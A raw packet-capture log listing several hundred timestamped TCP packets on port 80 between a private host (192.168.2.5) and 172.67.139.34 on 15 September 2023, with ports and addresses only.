Sep 15, 2023 11:23:56.048022985 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.048043013 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.048053980 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.048078060 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.048084021 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.048108101 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.048126936 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.048149109 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.048157930 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.048187971 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.048190117 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.048218012 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.048224926 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.048249006 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.048249006 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.048274994 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.048280001 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.048295021 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.048311949 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.048329115 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.048341990 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.048358917 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.048372030 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.048389912 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.048403025 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.048427105 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.048434019 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.048451900 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.048465014 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.048484087 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.048496008 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.048521996 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.048527002 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.048546076 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.048557043 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.048576117 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.048588037 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.048603058 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.048620939 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.048648119 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.048685074 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.048700094 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.048717976 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.048746109 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.048748016 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.048782110 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.048788071 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.048813105 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.048829079 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.077035904 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.077097893 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.077133894 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.077131987 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.077166080 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.077176094 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.077195883 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.077199936 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.077230930 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.077230930 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.077255011 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.077263117 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.077287912 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.077296972 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.077322960 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.077348948 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.132250071 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.132282019 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.132298946 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.132318020 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.132333040 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.132349968 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.132364035 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.132379055 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.132395029 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.132479906 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.132565022 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.132565022 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.132576942 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.132652998 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.132659912 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.132659912 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.132659912 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.132726908 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.132798910 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.132901907 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.132917881 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.133002043 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.133157969 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.133199930 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.133333921 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.133349895 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.133363962 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.133378983 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.133394003 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.133454084 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.133469105 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.133483887 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.133498907 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.133606911 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.133661032 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.133676052 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.133713961 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.133728981 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.133743048 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.135622025 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.135642052 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.135701895 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.135752916 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.135767937 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.135802984 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.135875940 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.135968924 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.135976076 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.135982037 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.151732922 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.151771069 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.151803970 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.151834965 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.151865959 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.151899099 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.151932001 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.151967049 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.151998997 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.152030945 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.152061939 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.152092934 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.152124882 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.152156115 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.152187109 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.152218103 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.152247906 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.152277946 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.152309895 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.152339935 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.152370930 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.152401924 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.152503014 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.152534008 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.152565956 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.152740002 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.152774096 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.152806044 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.152837992 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.152869940 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.152909994 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.152951002 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.152981997 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.153012037 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.153043032 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.153074980 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.153105974 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.153136969 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.153208017 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.153239012 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.153270006 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.153301001 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.153331995 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.153363943 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.153395891 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.153428078 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.153458118 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.153489113 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.153676987 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.153697968 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.153707981 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.153719902 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.153729916 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.153739929 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.153796911 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.153809071 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.153819084 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.153865099 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.153876066 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.153939009 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.153949976 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.154045105 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.154134035 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.154145002 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.154154062 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.154208899 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.154225111 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.154234886 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.154243946 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.154292107 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.154303074 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.154340982 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.154350996 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.154829025 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.154860020 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.154889107 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.154926062 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.154984951 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.154994965 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.155025959 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.155036926 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.155087948 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.155097961 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.155108929 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.155214071 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.155225039 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.155235052 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.155245066 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.155289888 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.155340910 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.155385971 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.155541897 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.155590057 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.155632973 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.155643940 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.155699968 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.155777931 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.155791044 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.155801058 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.155811071 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.155821085 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.155884981 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.155895948 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.155936003 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.155973911 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.155986071 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.156012058 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.156022072 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.156086922 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.156096935 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.156130075 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.156184912 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.156194925 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.156234026 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.156244993 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.156296968 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.156307936 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.156347036 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.156426907 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.156491041 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.156501055 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.156557083 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.156569004 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.156601906 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.156611919 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.156697035 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.156708002 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.156718016 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.156903982 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.156948090 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.156959057 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.156969070 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.156977892 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.157198906 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.157253027 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.157284021 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.157314062 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.157344103 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.157378912 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.157412052 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.157442093 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.157473087 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.157501936 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.157531023 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.157561064 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.157589912 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.157619953 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.157649040 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.157677889 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.157710075 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.157742023 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.157746077 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.157772064 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.157808065 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.157839060 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.157869101 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.157902002 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.157934904 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.157964945 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.158118010 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.158149004 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.158180952 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.158210993 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.158240080 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.158272028 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.158390999 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.158421040 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.158492088 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.158510923 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.158561945 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.158565998 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.158633947 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.158663034 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.168874025 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.168896914 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.168910980 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.168925047 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.168997049 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.169012070 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.169024944 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.169809103 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.169845104 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.169962883 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.170300007 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.170367956 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.170382023 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.170428038 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.170464993 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.170504093 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.223773956 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.223793983 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.223805904 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.223817110 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.224066973 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.224080086 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.224131107 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.224176884 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.224188089 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.224334955 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.224409103 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.224555016 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.224622011 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.224683046 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.224694967 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.224762917 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.224772930 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.224946022 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.224956989 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.224988937 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.251017094 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.251029015 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.251085997 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.251127005 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.251277924 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.251358986 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.251368999 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.251404047 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.251454115 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.251519918 CEST	80	49762	172.67.139.34	192.168.2.5
